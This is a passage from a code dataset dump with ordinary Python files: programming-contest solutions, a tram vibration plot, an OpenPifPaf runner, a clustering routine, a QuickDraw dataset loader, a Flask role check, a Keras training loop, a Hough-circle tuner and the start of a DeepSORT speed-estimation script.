kdo, od, do = dobiOpis(opra[i])\r\n kdoPol, odPol, doPol = dobiOpis(opra[(i + 1) % N])\r\n if kdo == kdoPol:\r\n pavza = odPol - do if i < N - 1 else (24 * 60 - do) + odPol\r\n heappush(pavze[kdo], (pavza, i, najdiNasl(slo, i, N)))\r\n\r\n while kajPopravil:\r\n kajPopravil = False\r\n for oseba in range(2):\r\n if pavze[oseba]:\r\n if pavze[oseba][0][0] + kolko[oseba] <= 720:\r\n kolk, id1, id2 = heappop(pavze[oseba])\r\n kolko[oseba] += kolk\r\n _, od1, do1 = dobiOpis(slo[id1])\r\n _, od2, do2 = dobiOpis(slo[id2])\r\n if id2 != 0:\r\n # del slo[id1]\r\n # del slo[id2]\r\n slo[id1] = ((od1, od2), oseba)\r\n else:\r\n slo[id1] = ((od1, 24 * 60), oseba)\r\n slo[id2] = ((0, do2), oseba)\r\n kajPopravil = True\r\n if kajPopravil:\r\n break\r\n menjave = 0\r\n for i in range(N):\r\n kdo1, od1, do1 = dobiOpis(slo[i])\r\n kdo2, od2, do2 = dobiOpis(slo[(i + 1) % N])\r\n if kdo1 != kdo2:\r\n menjave += 1\r\n elif ((do1 - od2) % (24 * 60)) != 0:\r\n menjave += 2\r\n return menjave\r\n\r\n\r\ndef resi(ime):\r\n notr = ime + \".in\"\r\n ven = ime + \".out\"\r\n with open(notr) as f:\r\n with open(ven, \"w\") as g:\r\n for ind in range(int(f.readline())):\r\n AC, AJ = [int(x) for x in f.readline().strip().split()]\r\n opravila = []\r\n for i in range(AC + AJ):\r\n kdo = i < AC\r\n interval = tuple([int(x) for x in f.readline().strip().split()])\r\n opravila.append((interval, 1 - kdo))\r\n opravila.sort()\r\n print(prikazi(ind + 1, resitev(opravila)), file=g)\r\n\r\nresi(\"B-large\")","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_210/76.py","file_name":"76.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2511162253","text":"import matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nimport numpy as np\n\nTFS = \"TFS\"\nINCENTRO = \"Incentro\"\nURBOS3 = \"Urbos 3\"\nseries = [(320, TFS, 1), (328, TFS, 2), (334, TFS, 3), (346, TFS, 4), (373, INCENTRO, 1), (383, INCENTRO, 2),\n (395, URBOS3, 1)]\nPAVE = \"pave\"\nHERBE = \"herbe\"\n\nrcParams['axes.titlesize'] = 22\nrcParams['axes.labelsize'] = 16\nrcParams['legend.fontsize'] = 12\n\n\nclass Tramway:\n __slots__ = [\"__number\", \"__distance\", \"__speed\", \"__freq\", \"__ampl\", \"__sol\"]\n\n def __init__(self, number, distance, speed, freq, ampl, sol):\n \"\"\"\n Définit une expérience avec un tramway.\n\n :param number: Numéro du tramway\n :param distance: Distance à laquelle est prise la mesure de vibration (en m)\n :param speed: Vitesse du tramway (en m/s)\n :param freq: Fréquence vibratoire au passage du tramway (en Hz)\n :param ampl: Amplitude des vibrations au passage du tramway (en mm/s^2)\n :param sol : Numéro associé au type de revetement de la voie où la mesure à lieu\n \"\"\"\n self.__number = number\n self.__distance = distance\n self.__speed = speed\n self.__freq = freq\n self.__ampl = ampl\n self.__sol = sol\n\n def get_type(self):\n for serie in series:\n if self.__number <= serie[0]:\n return serie[1], serie[2]\n\n def distance(self):\n return self.__distance\n\n def speed(self):\n return self.__speed\n\n def freq(self):\n return self.__freq\n\n def ampl(self):\n return self.__ampl\n\n def get_sol(self):\n return self.__sol\n\n\ndef main():\n tramways = [Tramway(319, 1, 6.94, 37.09, 46.4, PAVE), Tramway(375, 1, 5.83, 22.03, 49.5, PAVE),\n Tramway(317, 1, 5.23, 37.70, 47.6, PAVE), Tramway(380, 1, 4.21, 26.46, 52.6, PAVE),\n Tramway(328, 1, 6.02, 35.93, 46.8, PAVE), Tramway(344, 1, 8.31, 31.12, 40.5, PAVE),\n Tramway(330, 3, 6.27, 47.52, 29.2, PAVE), Tramway(377, 3, 7.13, 19.43, 20.7, PAVE),\n Tramway(339, 3, 5.02, 33.58, 21.4, PAVE), Tramway(363, 3, 4.34, 31.66, 27.2, PAVE),\n Tramway(342, 3, 5.49, 38.13, 22.2, PAVE), Tramway(340, 3, 6.47, 33.68, 25.1, PAVE),\n Tramway(357, 5, 6.60, 20.71, 16.6, PAVE),\n Tramway(322, 5, 7.32, 31.26, 16.7, PAVE), Tramway(305, 5, 4.72, 33.48, 15.4, PAVE)]\n\n tfs_pave = [tram for tram in tramways if tram.get_type()[0] == TFS and tram.get_sol() == PAVE]\n incentro_pave = [tram for tram in tramways if tram.get_type()[0] == INCENTRO and tram.get_sol() == PAVE]\n urbos3_pave = [tram for tram in tramways if tram.get_type()[0] == URBOS3 and tram.get_sol() == PAVE]\n tfs_herbe = [tram for tram in tramways if tram.get_type()[0] == TFS and tram.get_sol() == HERBE]\n incentro_herbe = [tram for tram in tramways if tram.get_type()[0] == INCENTRO and tram.get_sol() == HERBE]\n urbos3_herbe = [tram for tram in tramways if tram.get_type()[0] == URBOS3 and tram.get_sol() == HERBE]\n\n fig, ax = plt.subplots(figsize=(15, 8))\n ax.set_title('Amplitude vibratoire')\n ax.set_xlabel(r'Distance ($m$)')\n ax.set_ylabel(r'Amplitude ($mm.s^{-2}$)')\n ax.grid(which='major')\n ax.grid(which='minor', linestyle='--', linewidth=0.5)\n ax.minorticks_on()\n ax.scatter([tram.distance() for tram in tfs_pave], [tram.ampl() for tram in tfs_pave], label=TFS,\n s=121, c=\"steelblue\", marker=\"p\")\n ax.scatter([tram.distance() for tram in incentro_pave], [tram.ampl() for tram in incentro_pave],\n label=INCENTRO, s=121, c='steelblue', marker=\"X\")\n ax.scatter([tram.distance() for tram in tfs_herbe], [tram.ampl() for tram in tfs_herbe], label=TFS,\n s=121, c=\"seagreen\", marker=\"p\")\n 
ax.scatter([tram.distance() for tram in incentro_herbe], [tram.ampl() for tram in incentro_herbe],\n label=INCENTRO, s=121, c='seagreen', marker=\"X\")\n ax.set_ylim(0, 1.1 * max([tram.ampl() for tram in tramways]))\n\n ax.legend(loc='upper right')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"torpill40/clemenceau","sub_path":"tipe/graphe_p6_modif_en_cours.py","file_name":"graphe_p6_modif_en_cours.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28803765637","text":"from models.book import Book\n\nbook1 = Book(\"Diary\", \"Chuck Palahniuk\", \"fiction\", \"0\", True)\nbook2 = Book(\"Solaris\", \"Stanislaw Lem\", \"science-fiction\", \"1\", False)\nbook3 = Book(\"Jubiabá\", \"Jorje Amado\", \"fiction\", \"2\", True)\nbook4 = Book(\"Ursula K Le Guin\", \"The Dispossessed\", \"science-fiction\", \"3\", False)\n\n\nbooks = [book1, book2, book3, book4]\n\ndef add_new_book(book):\n books.append(book)\n\ndef remove_book(book):\n books.remove(book)\n\n\n# List all Books\n# * Show an individual Book\n# * Add a new Book to the Library.\n# * Remove a Book from the Library","repo_name":"RekaKovacs93/week_03-day_05-HW","sub_path":"models/books_list.py","file_name":"books_list.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20258466906","text":"#\n# Author: eloyhz\n# Date: Sep/14/2020\n#\n# UVa 00412 - Pi\n# https://onlinejudge.org/external/4/412.pdf\n#\n\nfrom math import sqrt\n\ndef gcd(a, b):\n return gcd(b, a % b) if b else a\n\n\ndef solve(a):\n n = len(a)\n b = []\n for i in range(n - 1):\n for j in range(i + 1, n):\n b.append((a[i], a[j]))\n count = 0\n for x in b:\n if gcd(x[0], x[1]) == 1:\n count += 1\n return sqrt(6 * len(b) / count) if count else 0\n\n\nif __name__ == '__main__':\n while True:\n n = int(input())\n if n == 0:\n break\n a = [0] * n\n for i in range(n):\n a[i] = int(input())\n ans = solve(a)\n if ans == 0:\n print('No estimate for this data set.')\n else:\n print(f'{ans:.6f}')\n\n","repo_name":"eloyhz/competitive-programming","sub_path":"UVa/uva000412_pi.py","file_name":"uva000412_pi.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"71313501313","text":"import os\nimport subprocess\nimport xml.etree.ElementTree as ET\n\nimport cv2\n\n\n\ndef update_xml_file(video_folder, video_filename):\n # XML 파일 수정\n targetXML = '/home/root1/anaconda3/envs/falldetection_ai/lib/python3.7/site-packages/openpifpaf/config/config.xml'\n tree = ET.parse(targetXML)\n root = tree.getroot()\n\n for rstpurl in root.iter('RTSPURL'):\n rstpurl.text = os.path.join(video_folder, video_filename)\n\n tree.write(targetXML, encoding='UTF-8')\n\ndef run_openpifpaf(video_folder, video_filename):\n # Openpifpaf 실행\n subprocess.run('cd /home/root1/anaconda3/envs/falldetection_ai/lib/python3.7/site-packages/openpifpaf/', shell=True)\n subprocess.run('python3 -m openpifpaf.video --show --video-fps=30', shell=True)\n\n# 동영상 파일 경로\nvideo_folder = '/home/root1/Desktop/videos/'\n\n# 최근에 생성된 동영상 파일 가져오기\nvideos_name = '/home/root1/Desktop/videos_Preprocessor/videos.mp4'\n\n\n# XML 파일 수정\nupdate_xml_file(video_folder, videos_name)\n#update_xml_file(video_folder, f'video{file_count + 1}.mp4')\n\n# Openpifpaf 실행\nrun_openpifpaf(video_folder, videos_name)\n#run_openpifpaf(video_folder, f'video{file_count + 1}.mp4')\n","repo_name":"P1nos/Sigma-FallDetection","sub_path":"엣지 컴퓨터/openpifpaf_processing.py","file_name":"openpifpaf_processing.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13151104928","text":"from copy import deepcopy\nimport numpy as np\n\n\ndef link(sim, f):\n \"\"\"Using single or complete-linkage (determined by f), builds a tree\n of clusters. Each index of the array tree is one level of the\n tree, where we can find multiple clusters.\n\n Takes the similarity matrix and objective function as inputs.\n\n \"\"\"\n tree = [{}]\n for x in range(len(sim) - 1):\n max_ij = np.unravel_index(np.nanargmax(sim), (len(sim), len(sim)))\n keep = min(max_ij)\n throw = max(max_ij)\n for i in range(len(sim)):\n if keep != i and throw != i:\n sim[keep, i] = f(sim[keep, i], sim[throw, i])\n sim[i, keep] = f(sim[i, keep], sim[i, throw])\n if throw != i:\n sim[throw, i] = np.NINF\n sim[i, throw] = np.NINF\n\n # Procedure to iteratively build the tree\n before = tree[len(tree) - 1]\n tree.append(deepcopy(before))\n now = tree[len(tree) - 1]\n if keep in now and throw in now:\n now[keep].extend(now[throw])\n now[keep].append(throw)\n now.pop(throw)\n elif keep in now:\n now[keep].append(throw)\n elif throw in now:\n now[keep] = [throw]\n now[keep].extend(now[throw])\n now.pop(throw)\n else:\n now[keep] = [throw]\n\n return tree\n","repo_name":"carlosgeos/in-da-hood","sub_path":"src/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23626330831","text":"import sys, itertools\r\n\r\ndef write_p(o, p):\r\n\tfor i in p:\r\n\t\tfor j in i:\r\n\t\t\to.write(j)\r\n\t\to.write('\\n')\r\n\t\t\r\ndef no_blue(p, num_rows, num_cols):\r\n\tfor i in range(0, num_rows):\r\n\t\tfor j in range(0, num_cols):\r\n\t\t\tif p[i][j] == '#':\r\n\t\t\t\treturn False\r\n\treturn True\r\n\t\t\r\ndef blue_check(p, num_rows, num_cols):\r\n\treturn True\r\n\tfor i in range(0, num_rows):\r\n\t\tfor j in range(0, num_cols):\r\n\t\t\tif i < num_rows - 1 and j < num_cols - 1:\r\n\t\t\t\ta = p[i+0][j+0] == '#'\r\n\t\t\t\tb = p[i+1][j+0] == '#'\r\n\t\t\t\tc = p[i+0][j+1] == '#' \r\n\t\t\t\td = p[i+1][j+1] == '#'\r\n\t\t\t\taa = a and b and c and d\r\n\t\t\t\tbb = a == False and b == False and c == False and d == False\r\n\t\t\t\tif not aa or bb:\r\n\t\t\t\t\treturn False\r\n\treturn True\r\n\t\t\r\n\r\n\r\nfilename = sys.argv[1]\r\nf = open(filename)\r\no = open(filename + \".out\", \"wt\")\r\nnum_tests = int(f.readline())\r\nfor t in range(1, num_tests+1):\r\n\to.write(\"Case #%d:\\n\" % t)\r\n\r\n\tnum_rows, num_cols = [int(x) for x in f.readline().split()]\r\n\tp = []\r\n\ttotal = 0\r\n\twhite = 0\r\n\tblue = 0\r\n\tfor r in range(0,num_rows):\r\n\t\tc = f.readline().strip()\r\n\t\ttotal += len(c)\r\n\t\tfor x in c:\r\n\t\t\tif x == '.': white += 1\r\n\t\t\tif x == '#': blue += 1\r\n\t\tp.append([x for x in c])\r\n\t#print p\r\n\t\r\n\t# check for easy cases\r\n\tif white == total:\r\n\t\twrite_p(o,p)\r\n\telif blue % 4 != 0:\r\n\t\to.write(\"Impossible\\n\")\r\n\telse:\r\n\t\tfor i in range(0, num_rows):\r\n\t\t\tfor j in range(0, num_cols):\r\n\t\t\t\tblue_block = i < num_rows - 1 and j < num_cols -1 and p[i+0][j+0] == '#' and p[i+1][j+0] == '#' and p[i+0][j+1] == '#' and p[i+1][j+1] == '#'\r\n\t\t\t\tif blue_block:\r\n\t\t\t\t\tp[i+0][j+0] = '/'\r\n\t\t\t\t\tp[i+1][j+0] = '\\\\'\r\n\t\t\t\t\tp[i+0][j+1] = '\\\\'\r\n\t\t\t\t\tp[i+1][j+1] = '/'\r\n\t\tif no_blue(p, num_rows, num_cols):\r\n\t\t\twrite_p(o,p)\r\n\t\telse:\r\n\t\t\to.write(\"Impossible\\n\")\r\n\t\r\n\t#o.write(\"Case #%d: %s\\n\" % (t, res))\r\no.close()\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_84/198.py","file_name":"198.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9829613979","text":"from flask import Blueprint\nfrom flask_login import current_user, login_required\n\nstudent = Blueprint('student', __name__)\n\n@student.before_request\n# @login_required\ndef before_request():\n if \"student\" != current_user.roles[0].role_name:\n return \"Unauthorized Access \"\n \n@student.route(\"/stud-home\")\n@login_required\ndef home():\n return \"Student Homepage \"\n ","repo_name":"naveeng2402/flask_role_based_auth_test","sub_path":"website/routes/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74332137475","text":"import main\nimport model\nimport preprocessing\nimport callbacks as my_callbacks\n\nimport numpy as np\nfrom pathlib import Path\nimport tensorflow as tf\nfrom tensorflow import keras\n\nimport sys\n\ndef prerun(args, meta, data):\n split = args[\"split_dir\"]\n aug = preprocessing.apply_augmentation if args[\"augmentation\"] else None\n\n with tf.device(\"/cpu:0\"): \n train_ds, val_ds, train_len, validation_len = preprocessing.load_datasets(\n Path(split, \"train.txt\"), Path(split, \"val.txt\"), meta, args, aug, data=data\n )\n\n return train_ds, val_ds, train_len, validation_len\n\ndef run(args, meta, model, callbacks, exp, id_=100, data=None):\n train_ds, val_ds, train_len, validation_len = prerun(args, meta, data)\n \n init_weights_path = Path(args[\"run_dir\"], 'initial_model_weights.h5')\n if init_weights_path.exists():\n model.load_weights(str(init_weights_path))\n \n if not init_weights_path.exists():\n hist = model.fit(train_ds,epochs=1,steps_per_epoch=1)\n model.save_weights(str(init_weights_path))\n \n for i, cb in enumerate(callbacks):\n if type(cb)==my_callbacks.ValidationMonitor:\n cb.set(val_ds, validation_len, id_, exp)\n if type(cb)==my_callbacks.ImageLogger:\n cb.set_dataset(train_ds, len(args[\"channels\"]))\n\n hist = model.fit(\n train_ds,\n epochs=args[\"epochs\"], \n steps_per_epoch=int(np.ceil(train_len/args[\"batch_size\"])),\n callbacks=callbacks,\n validation_data=val_ds,\n validation_steps=int(np.ceil(validation_len/args[\"batch_size\"]))\n )\n \n return hist\n","repo_name":"saeyslab/DeepLearning_for_ImagingFlowCytometry","sub_path":"functions/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"}
+{"seq_id":"5349510507","text":"# 调整霍夫圆环检测参数\n# trackbar参数范围待调整,否则会导致cv2.HoughCircles参数错误\n\nfrom __future__ import print_function\nimport cv2 as cv\nimport cv2 as cv2\nimport argparse\n\n\nmin_value = 1\nmax_value = 200\n\nminDist = 10\nparam1 = 10\nparam2 = 10\nminRadius = 10\nmaxRadius = 20\n\n\nparam1_name = 'minDist'\nparam2_name = 'param1'\nparam3_name = 'param2'\nparam4_name = 'minRadius'\nparam5_name = 'maxRadius'\n\ndef on_param1_thresh_trackbar(val):\n global minDist\n minDist = max(val, 0)\n cv.setTrackbarPos(param1_name, window_trackbar_name, minDist)\n\ndef on_param2_thresh_trackbar(val):\n global param1\n param1 = max(val, 0)\n cv.setTrackbarPos(param2_name, window_trackbar_name, param1)\n\ndef on_param3_thresh_trackbar(val):\n global param2\n param2 = max(val, 0)\n cv.setTrackbarPos(param3_name, window_trackbar_name, param2)\n\ndef on_param4_thresh_trackbar(val):\n global minRadius\n global maxRadius\n minRadius = val\n minRadius = min(maxRadius-1, minRadius)\n cv.setTrackbarPos(param4_name, window_trackbar_name, minRadius)\n\ndef on_param5_thresh_trackbar(val):\n global minRadius\n global maxRadius\n maxRadius = val\n maxRadius = max(maxRadius, minRadius+1)\n cv.setTrackbarPos(param5_name, window_trackbar_name, maxRadius)\n\nparser = argparse.ArgumentParser(description='Code for Thresholding Operations using inRange tutorial.')\nparser.add_argument('--camera', help='Camera devide number.', default=0, type=int)\nargs = parser.parse_args()\n\ncap = cv.VideoCapture(args.camera)\n\nwindow_trackbar_name = \"Params\"\ncv.namedWindow(window_trackbar_name)\ncv.createTrackbar(param1_name, window_trackbar_name, min_value, max_value, on_param1_thresh_trackbar)\ncv.createTrackbar(param2_name, window_trackbar_name, min_value, max_value, on_param2_thresh_trackbar)\ncv.createTrackbar(param3_name, window_trackbar_name, min_value, max_value, on_param3_thresh_trackbar)\ncv.createTrackbar(param4_name, window_trackbar_name, min_value, max_value, on_param4_thresh_trackbar)\ncv.createTrackbar(param5_name, window_trackbar_name, min_value, max_value, on_param5_thresh_trackbar)\n\nwhile True:\n ## [while]\n ret, frame = cap.read()\n if frame is None:\n break\n\n ret, img = cap.read()\n # cv2.imshow('1',img)\n #降噪(模糊处理用来减少瑕疵点)\n # result = cv2.blur(img, (5,5))\n # cv2.imshow('2',result)\n #灰度化,就是去色(类似老式照片)\n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n # cv2.imshow('3',gray)\n \n #param1的具体实现,用于边缘检测 \n # canny = cv2.Canny(img, 40, 80) \n # cv2.imshow('4', canny) \n \n #霍夫变换圆检测\n a,b,c,d,e = minDist, param1, param2, minRadius, maxRadius\n # circles= cv2.HoughCircles(gray,cv2.HOUGH_GRADIENT,1,10,param1=40,param2=20,minRadius=15,maxRadius=20)\n # cv2.HoughCircles(image, method, dp, minDist, circles=None, param1=None, param2=None, minRadius=None, maxRadius=None)\n circles= cv2.HoughCircles(gray,cv2.HOUGH_GRADIENT,1,a,param1=b,param2=c,minRadius=d,maxRadius=e)\n #输出返回值,方便查看类型\n print(circles)\n if type(circles) == None.__class__:\n continue\n\n #输出检测到圆的个数\n print(len(circles[0]))\n \n #根据检测到圆的信息,画出每一个圆\n for circle in circles[0]:\n #圆的基本信息\n print(circle[2])\n #坐标行列(就是圆心)\n x=int(circle[0])\n y=int(circle[1])\n #半径\n r=int(circle[2])\n #在原图用指定颜色圈出圆,参数设定为int所以圈画存在误差\n img=cv2.circle(img,(x,y),r,(0,0,255),1,8,0)\n #显示新图像\n cv2.imshow('Result',img)\n \n key = cv.waitKey(30)\n if key == ord('q') or key == 27:\n break\n\ncv2.destroyAllWindows()\n 
\n\n\n\n\n\n","repo_name":"leebinjun/cchess-brobot","sub_path":"vision/classify/01_circle_params.py","file_name":"01_circle_params.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"73138194753","text":"import pickle\n\nimport cv2\nimport tensorflow as tf\nimport os\nfrom datasets.dataset import Dataset\nfrom tf_records_parser.cifar10 import LOCAL_FOLDER\nimport numpy as np\nimport json\nimport re\n\n\nIMAGE_SHAPE = [128, 128, 1]\nfolder_records = \"tf_records_quickdraw\"\n\ndef parse_function(example_proto):\n features = {\"image_raw\": tf.FixedLenFeature((), tf.string),\n \"label\": tf.FixedLenFeature((), tf.int64),\n \"index\": tf.FixedLenFeature((), tf.string)\n }\n parsed_features = tf.parse_single_example(example_proto, features)\n\n flat_image = tf.decode_raw(parsed_features[\"image_raw\"], tf.uint8)\n reconst = tf.cast(tf.transpose(tf.reshape(flat_image, tf.stack([1, 128, 128])), [1, 2, 0], 'reconstructed_image'),tf.float32)\n\n return parsed_features[\"index\"], reconst, parsed_features[\"label\"]\n\n\ndef get_n_classes():\n class_map = os.path.join(LOCAL_FOLDER, folder_records, \"labelnames.json\")\n with open(class_map, 'r') as f:\n names_data = json.load(f)\n return len(names_data)\ndef get_records_folder():\n return os.path.join(LOCAL_FOLDER, folder_records)\n\n\ndef list_records():\n path_records = get_records_folder()\n\n # list all tfrecords\n tfrecords = list(map(lambda x: os.path.join(path_records, x), sorted(filter(\n lambda name: name.split('.')[-1] == 'tfrecord',\n os.listdir(path_records)))))\n return tfrecords\n\n\nclass QuickDraw_Dataset(Dataset):\n\n def __init__(self, epochs, batch_size, data_folder=None, **kwargs):\n tfrecords = list_records()\n n_records = len(tfrecords)\n self.n_classes = get_n_classes()\n print(\"Loaded {0} classes\".format(self.n_classes))\n\n if data_folder:\n self.data_folder = data_folder\n\n # load class_name -> label map\n class_map = os.path.join(self.data_folder,\"labelnames.json\")\n with open(class_map,'r') as f:\n names_data=json.load(f)\n self.class_name_map = {names_data[label].split('.')[0] : label for label in names_data}\n\n\n tfrecords.sort(key=lambda x: int(re.search('.+_(\\d+).tfrecord', x).group(1)))\n train_records = [tfrecords[i] for i in [7,0,1,2,8,13,14,19,20]]\n validation_records = [tfrecords[i] for i in [5]] # ,3,4,5,11,15\n test_records = [tfrecords[i] for i in [6]] # ,12,16\n #\n #,9,10,17,18\n\n #.cache('temp/dataset_cached_qd_tr.cache')\n #.cache('temp/dataset_cached_qd_val.cache')\n #.cache('temp/dataset_cached_qd_test.cache')\n\n train_n_records,val_n_records,test_n_records = len(train_records),len(validation_records),len(test_records)\n print(\"Train records : {0} , Val records: {1} , Test records {2}\".format(train_n_records,len(validation_records),len(test_records)))\n #assert (train_n_records + val_n_records + test_n_records == n_records), \"The train-val-test split must use all tf records.\"\n\n\n\n dataset_train = tf.data.TFRecordDataset(train_records).map(parse_function)\n dataset_val = tf.data.TFRecordDataset(validation_records).map(parse_function)\n dataset_test = tf.data.TFRecordDataset(test_records).map(parse_function)\n\n # Calculate mean image, std image\n mean_image_path = os.path.join(LOCAL_FOLDER, 'mean_quickdraw.npy')\n train_index_list_path = os.path.join(LOCAL_FOLDER, 'train_list_quickdraw.pkl')\n train_labels = os.path.join(LOCAL_FOLDER, 'labels_quickdraw.pkl')\n\n if not os.path.exists(mean_image_path):\n sess = tf.get_default_session()\n temp_iterator = dataset_train.batch(10).make_one_shot_iterator().get_next()\n p_mean = np.zeros(IMAGE_SHAPE)\n c = 0\n train_index_list=[]\n all_labels = []\n\n try:\n while True:\n index, batch_x, batch_y = 
sess.run(temp_iterator)\n p_mean = p_mean + np.mean(batch_x, axis=0) # IMAGE_SHAPE\n c += 1\n train_index_list += index.tolist()\n all_labels += batch_y.tolist()\n except tf.errors.OutOfRangeError:\n self.mean = (p_mean / c).astype(np.float32)\n self.train_index_list = train_index_list\n np.save(mean_image_path, self.mean)\n with open(train_index_list_path,'wb') as f:\n pickle.dump(train_index_list,f,-1)\n\n\n\n with open(train_labels, 'wb') as f:\n dict_labels = {ind : lbl for (ind,lbl) in zip(train_index_list,all_labels)}\n pickle.dump(dict_labels, f, -1)\n print(\"Saved mean image\")\n print(\"Saved train index list\")\n else:\n print(\"Mean image loaded from file\")\n print(\"Train index list loaded from file\")\n self.mean = np.load(mean_image_path)\n with open(train_index_list_path,'rb') as f:\n self.train_index_list = pickle.load(f)\n\n with open(train_labels,'rb') as f:\n self.label_dict = pickle.load(f)\n self.label_dict = {k.decode('utf8') : self.label_dict[k] for k in self.label_dict}\n\n\n self.train_index_list = list(map(lambda x : x.decode('utf8'),self.train_index_list)) #each string was a byte array\n\n def preprocess(index, x, y):\n return (index, tf.add(x, -self.mean) / 255, tf.one_hot(y, self.n_classes))\n\n\n # preprocesss\n # shuffle_buffer = int(self.n_classes*1000*0.8)\n self.train_dataset = dataset_train.map(preprocess).repeat(epochs).batch(batch_size)\n self.valid_dataset = dataset_val.map(preprocess).repeat(1).batch(batch_size)\n self.dataset_test = dataset_test.map(preprocess).repeat(1).batch(batch_size)\n\n # Create iterator\n iterator = self.iterator = tf.data.Iterator.from_structure(self.train_dataset.output_types,\n self.train_dataset.output_shapes)\n\n # check parameters\n super().__init__(**kwargs)\n\n def preprocess_batch(self, image_batch):\n \"\"\"\n Process a new batch substract train_mean.\n :return:\n \"\"\"\n\n return (image_batch - self.mean) / 255\n\n def inverse_preprocess(self, image_batch):\n return (image_batch * 255) + self.mean\n\n @property\n def shape(self):\n return IMAGE_SHAPE\n\n @property\n def shape_target(self):\n return [self.n_classes]\n\n def get_index_list(self):\n assert (hasattr(self, 'data_folder')), \"Image folder undefined\"\n return self.train_index_list\n\n def get_train_image_at(self, index,strict=False): # index is image path\n # example: n02423022_7746.JPEG\n # n02423022_original_images\n assert (hasattr(self, 'data_folder')), \"Image folder undefined\"\n if not(index in self.train_index_list):\n print(\"WARNING IMAGE NOT IN TRAIN LIST YOU ARE USING A TEST OR VALIDATION IMAGE\")\n if strict:\n print(\"Strict mode returning NONE\")\n return None\n inverse_class_name = {int(self.class_name_map[k]) : k for k in self.class_name_map}\n class_name = inverse_class_name[self.label_dict[index]]\n full_path = os.path.join(self.data_folder,class_name, \"{0}_{1}.png\".format(class_name,index))\n img = cv2.imread(full_path,cv2.IMREAD_GRAYSCALE)\n s = self.vis_shape()\n img_out = cv2.resize(img, tuple(s[0:2])) # original image need resize\n\n return img_out.reshape(1, s[0], s[1], 1), [self.class_name_map[class_name]]\n\n def get_data_range(self):\n return [0, 255]\n\n def vis_shape(self):\n return [128,128]\n\n\nif __name__ == '__main__':\n with tf.Session().as_default() as sess:\n t = QuickDraw_Dataset(1, 
10,data_folder='./temp/quickdraw_expanded_images')\n","repo_name":"aferral/mejora_clasificador_feedback_CAM","sub_path":"datasets/quickdraw_dataset.py","file_name":"quickdraw_dataset.py","file_ext":"py","file_size_in_byte":7860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40285724037","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 7 22:27:38 2017\n\n@author: yc\n\"\"\"\n\nclass Solution(object):\n def findLengthOfLCIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n c = []\n count = 0\n i = 0\n while(i 0:\r\n tf.config.experimental.set_memory_growth(physical_devices[0], True)\r\nfrom absl import app, flags, logging\r\nfrom absl.flags import FLAGS\r\nimport core.utils as utils\r\nfrom core.yolov4 import filter_boxes\r\nfrom tensorflow.python.saved_model import tag_constants\r\nfrom core.config import cfg\r\nfrom PIL import Image\r\nimport cv2\r\nimport math\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.compat.v1 import ConfigProto\r\nfrom tensorflow.compat.v1 import InteractiveSession\r\n# deep sort imports\r\nfrom deep_sort import preprocessing, nn_matching\r\nfrom deep_sort.detection import Detection\r\nfrom deep_sort.tracker import Tracker\r\nfrom tools import generate_detections as gdet\r\nfrom speed_calculation import speed_estimation_module\r\n\r\nflags.DEFINE_string('framework', 'tf', '(tf, tflite, trt')\r\nflags.DEFINE_string('weights', './checkpoints/yolov4-416',\r\n 'path to weights file')\r\nflags.DEFINE_integer('size', 416, 'resize images to')\r\nflags.DEFINE_boolean('tiny', False, 'yolo or yolo-tiny')\r\nflags.DEFINE_string('model', 'yolov4', 'yolov3 or yolov4')\r\nflags.DEFINE_string('video', './data/video/video_01.mp4', 'path to input video or set to 0 for webcam')\r\nflags.DEFINE_string('output', './outputs/demo_01.avi', 'path to output video')\r\nflags.DEFINE_string('output_format', 'XVID', 'codec used in VideoWriter when saving video to file')\r\nflags.DEFINE_float('iou', 0.45, 'iou threshold')\r\nflags.DEFINE_float('score', 0.50, 'score threshold')\r\nflags.DEFINE_boolean('dont_show', False, 'dont show video output')\r\nflags.DEFINE_boolean('info', False, 'show detailed info of tracked objects')\r\nflags.DEFINE_boolean('count', False, 'count objects being tracked on screen')\r\nflags.DEFINE_boolean('mask', True, 'do you want to have mask')\r\nflags.DEFINE_string('mask_path', './data/mask1.png', 'path to mask image')\r\n\r\n\r\ndef four_point_transform(image, rect):\r\n # obtain a consistent order of the points and unpack them\r\n \r\n\r\n # individually\r\n # rect = order_points(pts)\r\n (tl, tr, br, bl) = rect\r\n # compute the width of the new image, which will be the\r\n # maximum distance between bottom-right and bottom-left\r\n # x-coordiates or the top-right and top-left x-coordinates\r\n widthA = 